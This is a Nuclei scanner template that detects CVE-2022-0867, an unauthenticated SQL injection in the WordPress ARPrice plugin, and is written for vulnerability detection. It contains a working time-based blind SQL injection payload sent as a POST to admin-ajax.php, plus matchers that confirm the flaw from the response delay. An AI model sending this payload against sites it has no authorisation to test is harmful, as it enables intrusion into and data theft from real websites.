id: CVE-2022-0867

info:
  name: WordPress ARPrice <3.6.1 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
    - https://wordpress.org/plugins/arprice-responsive-pricing-table/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0867
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0867
    cwe-id: CWE-89
  metadata:
    verified: "true"
  tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve

requests:
  - raw:
      - |
        @timeout: 10s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)

      - |
        GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code_1 == 200'
          - 'contains(content_type_1, "text/html")'
          - 'contains(body_2, "ArpPriceTable")'
        condition: and

# Enhanced by md on 2022/12/09